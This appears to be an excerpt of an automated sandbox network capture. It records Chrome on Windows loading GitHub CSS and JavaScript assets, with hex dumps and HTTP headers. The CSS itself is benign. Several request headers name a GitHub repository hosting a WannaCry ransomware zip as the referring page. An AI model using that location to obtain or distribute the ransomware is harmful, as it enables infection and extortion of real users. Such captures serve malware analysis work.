                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 79 3a 3a 61 66 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 29 29 2c 20 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 29 29 29 7d 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d 6d
                                                                                      Data Ascii: y::after{margin-left:2px;background-color:var(--bgColor-default, var(--color-canvas-default));background-image:linear-gradient(var(--bgColor-default, var(--color-canvas-default)), var(--bgColor-default, var(--color-canvas-default)))}.branch-action-state-m
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 69 65 77 73 2e 6f 6e 20 2e 69 67 6e 6f 72 65 2d 61 70 70 72 6f 76 61 6c 73 2d 66 72 6f 6d 2d 63 6f 6e 74 72 69 62 75 74 6f 72 73 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 72 65 76 69 65 77 73 2e 6f 6e 20 2e 72 65 71 75 69 72 65 2d 6c 61 73 74 2d 70 75 73 68 2d 61 70 70 72 6f 76 61 6c 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 72 65 76 69 65 77 73 2e 6f 6e 20 2e 61 6c 6c 6f 77 2d 66 6f 72 63 65 2d 70 75 73 68 65 73 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 72 65 76 69 65 77 73 2e 6f 6e 20 2e 72 65 71 75 69 72 65 2d 61 70 70 72 6f 76 69 6e 67 2d 72 65 76 69 65 77 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 72 65 76 69 65 77 73 20 2e 72 65 71 75 69 72 65 2d
                                                                                      Data Ascii: iews.on .ignore-approvals-from-contributors,.protected-branch-reviews.on .require-last-push-approval,.protected-branch-reviews.on .allow-force-pushes,.protected-branch-reviews.on .require-approving-reviews{display:block}.protected-branch-reviews .require-
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 62 6c 65 20 2e 6f 63 74 69 63 6f 6e 2d 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 70 75 73 68 65 72 73 2d 74 61 62 6c 65 20 2e 61 76 61 74 61 72 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 70 75 73 68 65 72 73 2d 74 61 62 6c 65 20 2e 6f 63 74 69 63 6f 6e 2d 6a 65 72 73 65 79 2c 2e 70 72 6f 74 65 63 74 65 64 2d 62 72 61 6e 63 68 2d 70 75 73 68 65 72 73 2d 74 61 62 6c 65 20 2e 6f 63 74 69 63 6f 6e 2d 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 7b 77 69 64 74 68 3a 33 36 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 70 75 6c 6c 2d 6d 65 72 67 69 6e 67 20 2e 70 75 6c 6c 2d 6d 65 72 67 69 6e 67 2d 65 72 72 6f 72 7b 64 69 73 70 6c 61 79
                                                                                      Data Ascii: ble .octicon-organization,.protected-branch-pushers-table .avatar,.protected-branch-pushers-table .octicon-jersey,.protected-branch-pushers-table .octicon-organization{width:36px;margin-right:8px;text-align:center}.pull-merging .pull-merging-error{display
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 73 71 75 61 73 68 69 6e 67 2d 62 6f 64 79 2c 2e 6d 65 72 67 65 2d 70 72 20 2e 6d 65 72 67 69 6e 67 2d 62 6f 64 79 2d 6d 65 72 67 65 2d 77 61 72 6e 69 6e 67 2c 2e 6d 65 72 67 65 2d 70 72 20 2e 6d 65 72 67 69 6e 67 2d 64 69 72 65 63 74 6c 79 2d 77 61 72 6e 69 6e 67 2c 2e 6d 65 72 67 65 2d 70 72 20 2e 73 71 75 61 73 68 2d 63 6f 6d 6d 69 74 2d 61 75 74 68 6f 72 2d 65 6d 61 69 6c 2d 69 6e 66 6f 2c 2e 6d 65 72 67 65 2d 70 72 20 2e 6d 65 72 67 65 2d 63 6f 6d 6d 69 74 2d 61 75 74 68 6f 72 2d 65 6d 61 69 6c 2d 69 6e 66 6f 2c 2e 6d 65 72 67 65 2d 70 72 2e 69 73 2d 6d 65 72 67 69 6e 67 20 2e 6d 65 72 67 65 2d 71 75 65 75 65 2d 69 6e 66 6f 2c 2e 6d 65 72 67 65 2d 70 72 2e 69 73 2d 6d 65 72 67 69 6e 67 20 2e 62 72 61 6e 63 68 2d 61 63 74 69 6f 6e 2d 73 74 61 74 65 2d
                                                                                      Data Ascii: squashing-body,.merge-pr .merging-body-merge-warning,.merge-pr .merging-directly-warning,.merge-pr .squash-commit-author-email-info,.merge-pr .merge-commit-author-email-info,.merge-pr.is-merging .merge-queue-info,.merge-pr.is-merging .branch-action-state-


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.1649712185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC655OUTGET /assets/code-ad2fce00d003.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC672INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 31162
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Mon, 18 Mar 2024 01:42:03 GMT
                                                                                      ETag: 0x8DC46EC9CAB7368
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 392983
                                                                                      X-Served-By: cache-iad-kcgs7200083-IAD, cache-ewr18181-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 92, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: c16b5fa8119bd0a8c528db44a57293d0e27d9997
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 2e 42 6f 72 64 65 72 47 72 69 64 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 36 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 36 70 78 3b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 68 69 64 64 65 6e 7d 2e 42 6f 72 64 65 72 47 72 69 64 20 2e 42 6f 72 64 65 72 47 72 69 64 2d 63 65 6c 6c 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 42 6f 72 64 65 72 47 72 69 64 2d 2d 73 70 61 63 69 6f 75 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f
                                                                                      Data Ascii: .BorderGrid{display:table;width:100%;margin-top:-16px;margin-bottom:-16px;table-layout:fixed;border-collapse:collapse;border-style:hidden}.BorderGrid .BorderGrid-cell{padding-top:16px;padding-bottom:16px}.BorderGrid--spacious{margin-top:-24px;margin-botto
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 36 2c 31 30 2c 2e 38 29 7d 2e 68 65 61 74 5b 64 61 74 61 2d 68 65 61 74 3d 22 34 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 34 36 2c 31 30 36 2c 31 30 2c 2e 37 29 7d 2e 68 65 61 74 5b 64 61 74 61 2d 68 65 61 74 3d 22 35 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 34 36 2c 31 30 36 2c 31 30 2c 2e 36 29 7d 2e 68 65 61 74 5b 64 61 74 61 2d 68 65 61 74 3d 22 36 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 34 36 2c 31 30 36 2c 31 30 2c 2e 35 29 7d 2e 68 65 61 74 5b 64 61 74 61 2d 68 65 61 74 3d 22 37 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 34 36 2c 31 30 36 2c 31 30 2c 2e 34 29 7d 2e 68 65 61 74 5b 64 61 74 61 2d 68 65 61 74 3d 22 38 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32
                                                                                      Data Ascii: 6,10,.8)}.heat[data-heat="4"]{background:rgba(246,106,10,.7)}.heat[data-heat="5"]{background:rgba(246,106,10,.6)}.heat[data-heat="6"]{background:rgba(246,106,10,.5)}.heat[data-heat="7"]{background:rgba(246,106,10,.4)}.heat[data-heat="8"]{background:rgba(2
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 3b 6f 70 61 63 69 74 79 3a 2e 33 7d 2e 62 6c 61 6d 65 2d 68 75 6e 6b 20 67 2d 65 6d 6f 6a 69 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6c 61 6d 65 2d 68 75 6e 6b 3a 68 6f 76 65 72 20 2e 72 65 62 6c 61 6d 65 2d 6c 69 6e 6b 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 62 6c 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 6c 61 6d 65 2d 62 6c 6f 62 2d 6e 75 6d 2c 2e 62 6c 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 6c 6f 62 2d 63 6f 64 65 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 70 78 7d 2e 62 6c 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62
                                                                                      Data Ascii: olor-muted, var(--color-fg-muted));opacity:.3}.blame-hunk g-emoji{font-size:14px !important}.blame-hunk:hover .reblame-link{opacity:1}.blame-container .blame-blob-num,.blame-container .blob-code-inner{padding-top:3px;padding-bottom:3px}.blame-container .b
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 6e 63 68 2d 63 6f 6e 74 72 69 62 75 74 65 2d 72 69 67 68 74 3a 3a 62 65 66 6f 72 65 2c 2e 62 72 61 6e 63 68 2d 63 6f 6e 74 72 69 62 75 74 65 2d 72 69 67 68 74 3a 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 31 30 70 78 7d 7d 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 62 72 61 6e 63 68 2d 69 6e 66 6f 2d 64 72 6f 70 64 6f 77 6e 2d 73 69 7a 65 7b 74 6f 70 3a 36 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 7d 2e 63 72 65 61 74 65 2d 62 72 61 6e 63 68 2d 73 6f 75 72 63 65 2d 62 72 61 6e 63 68 20 2e 53 65 6c 65 63 74 4d 65 6e 75 2d 6d 6f 64 61 6c 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 62 72 61
                                                                                      Data Ascii: nch-contribute-right::before,.branch-contribute-right::after{right:auto;left:10px}}@media(min-width: 767px){.branch-info-dropdown-size{top:6px;width:auto;min-width:300px}}.create-branch-source-branch .SelectMenu-modal{max-height:100%;overflow:visible}.bra
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 62 72 61 6e 63 68 65 73 20 2e 6c 6f 61 64 69 6e 67 2d 6f 76 65 72 6c 61 79 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 29 29 3b 6f 70 61 63 69 74 79 3a 2e 37 7d 2e 62 72 61 6e 63 68 65 73 20 2e 6c 6f 61 64 69 6e 67 2d 6f 76 65 72 6c 61 79 20 2e 73 70 69 6e 6e 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 62 72 61 6e 63 68 65 73 2e 69 73 2d 6c 6f 61 64 69 6e 67 20 2e 6c 6f 61
                                                                                      Data Ascii: branches .loading-overlay::before{position:absolute;top:0;right:0;bottom:0;left:0;content:"";background-color:var(--bgColor-default, var(--color-canvas-default));opacity:.7}.branches .loading-overlay .spinner{display:inline-block}.branches.is-loading .loa
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 66 6f 72 6d 2d 64 72 6f 70 64 6f 77 6e 3a 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 31 32 70 78 29 7b 2e 66 69 6c 65 2d 63 6f 6d 6d 69 74 2d 66 6f 72 6d 2d 64 72 6f 70 64 6f 77 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 61 75 74 6f 3b 6c 65 66 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 34 32 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 66 69 6c 65 2d 63 6f 6d 6d 69 74 2d 66 6f 72 6d 2d 64 72 6f 70 64 6f 77 6e 3a 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 7d 2e 72 65 61 63 74 2d 63 6f 64 65 2d 76 69 65 77 2d 65 64 69 74 20 2e 63 6d 2d 65 64 69 74 6f 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68
                                                                                      Data Ascii: form-dropdown::after{display:none}@media(min-width: 1012px){.file-commit-form-dropdown{position:absolute;top:auto;left:auto;width:420px;height:auto}.file-commit-form-dropdown::after{display:inline-block}}.react-code-view-edit .cm-editor{border-bottom-righ
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 2e 66 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 2b 2e 62 72 65 61 64 63 72 75 6d 62 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 66 69 6c 65 2d 62 6c 61 6e 6b 73 6c 61 74 65 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 36 70 78 20 36 70 78 7d 2e 61 62 6f 75 74 2d 6d 61 72 67 69 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 31 31 70 78 29 7b 2e 61 62 6f 75 74 2d 6d 61 72 67 69 6e 7b 77 69 64 74 68 3a
                                                                                      Data Ascii: t:left;margin-top:0;margin-left:4px;font-size:16px;line-height:26px}.file-navigation+.breadcrumb{margin-bottom:8px}.file-blankslate{border:0;border-radius:0 0 6px 6px}.about-margin{margin-top:12px}@media screen and (max-width: 1011px){.about-margin{width:
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 74 69 6f 6e 20 2e 78 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 66 66 42 6c 6f 62 2d 61 64 64 69 74 69 6f 6e 2d 66 67 43 6f 6c 6f 72 2d 74 65 78 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 64 69 66 66 2d 62 6c 6f 62 2d 61 64 64 69 74 69 6f 6e 2d 66 67 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 66 66 42 6c 6f 62 2d 61 64 64 69 74 69 6f 6e 2d 62 67 43 6f 6c 6f 72 2d 77 6f 72 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 64 69 66 66 2d 62 6c 6f 62 2d 61 64 64 69 74 69 6f 6e 2d 77 6f 72 64 2d 62 67 29 29 7d 2e 64 69 66 66 2d 74 65 78 74 2d 63 65 6c 6c 20 2e 73 79 6e 74 61 78 2d 68 69 67 68 6c 69 67 68 74 65 64 2d 6c 69 6e 65 2e 64 65 6c 65 74 69 6f 6e 20 2e 78 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 66 66 42 6c
                                                                                      Data Ascii: tion .x{color:var(--diffBlob-addition-fgColor-text, var(--color-diff-blob-addition-fg));background-color:var(--diffBlob-addition-bgColor-word, var(--color-diff-blob-addition-word-bg))}.diff-text-cell .syntax-highlighted-line.deletion .x{color:var(--diffBl
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 63 65 6c 6c 2d 77 69 64 74 68 3a 20 34 30 70 78 3b 2d 2d 64 69 66 66 2d 6c 69 6e 65 2d 6d 69 6e 69 6d 75 6d 2d 68 65 69 67 68 74 3a 20 32 34 70 78 7d 2e 68 75 6e 6b 2d 6b 65 62 61 62 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 6c 69 6e 65 2d 6e 75 6d 62 65 72 2d 63 65 6c 6c 2d 77 69 64 74 68 29 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 66 66 42 6c 6f 62 2d 68 75 6e 6b 2d 62 67 43 6f 6c 6f 72 2d 6e 75 6d 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 64 69 66 66 2d 62 6c 6f 62 2d 68 75 6e 6b 2d 6e 75 6d 2d 62 67 29 29 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 72 69 67 68 74 7d 74 61 62 6c 65 5b 64 61 74 61 2d 62 6c 6f 63
                                                                                      Data Ascii: cell-width: 40px;--diff-line-minimum-height: 24px}.hunk-kebab-icon{display:flex;width:var(--line-number-cell-width);padding-top:4px;background-color:var(--diffBlob-hunk-bgColor-num, var(--color-diff-blob-hunk-num-bg));justify-content:right}table[data-bloc
                                                                                      2024-03-23 14:47:21 UTC1378INData Raw: 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 29 29 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 73 63 72 6f 6c 6c 2d 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 76 68 7d 2e 65 78 70 61 6e 64 2d 72 6f 77 2d 65 6c 6c 69 70 73 69 73 7b 7a 2d 69 6e 64 65 78 3a 33 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 29 29 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e
                                                                                      Data Ascii: overflow:visible;color:var(--fgColor-default, var(--color-fg-default));vertical-align:middle;scroll-margin-top:20vh}.expand-row-ellipsis{z-index:3;max-height:20px;color:var(--fgColor-muted, var(--color-fg-subtle));pointer-events:auto;background-color:tran


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.1649713185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC681OUTGET /assets/react-code-view.959fb0b61e6a1de773e7.module.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC670INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 633
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Tue, 19 Mar 2024 19:50:48 GMT
                                                                                      ETag: 0x8DC484DE009DECE
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 246612
                                                                                      X-Served-By: cache-iad-kjyo7100171-IAD, cache-lga21970-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 36, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: b52c846d3ce743cc856fbd136dbb6794778ab736
                                                                                      2024-03-23 14:47:21 UTC633INData Raw: 2e 41 73 6b 43 6f 70 69 6c 6f 74 42 75 74 74 6f 6e 2d 6d 6f 64 75 6c 65 5f 5f 73 71 75 61 72 65 2d 2d 6f 38 6b 44 4f 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 64 65 66 61 75 6c 74 2c 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 29 29 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 77 69 64 74 68 3a 32 38 70 78 7d 2e 41 73 6b 43 6f 70 69 6c 6f 74 42 75 74 74 6f 6e 2d 6d 6f 64 75 6c 65 5f 5f 73 71 75 61 72 65 2d 2d 6f 38 6b 44 4f 2e 41 73 6b 43 6f 70 69 6c 6f 74 42 75 74 74 6f 6e 2d 6d 6f 64 75 6c 65 5f 5f 6d 75 74 65 64 2d 2d 51 61 74 63 47 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 67 43 6f 6c 6f 72 2d 6d 75 74 65 64 2c 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 29 29 7d 2e 43 6f 70 69 6c 6f 74 43 6f 64 65
                                                                                      Data Ascii: .AskCopilotButton-module__square--o8kDO{color:var(--fgColor-default,var(--color-fg-default));height:28px;width:28px}.AskCopilotButton-module__square--o8kDO.AskCopilotButton-module__muted--QatcG{color:var(--fgColor-muted,var(--color-fg-muted))}.CopilotCode


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.1649714185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC646OUTGET /assets/wp-runtime-5afb085e74be.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 37950
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 22 Mar 2024 20:02:38 GMT
                                                                                      ETag: 0x8DC4AAB064AA869
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 28764
                                                                                      X-Served-By: cache-iad-kjyo7100102-IAD, cache-lga21945-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 35, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 348f933eec59986f666bb56d227a456403bbc01b
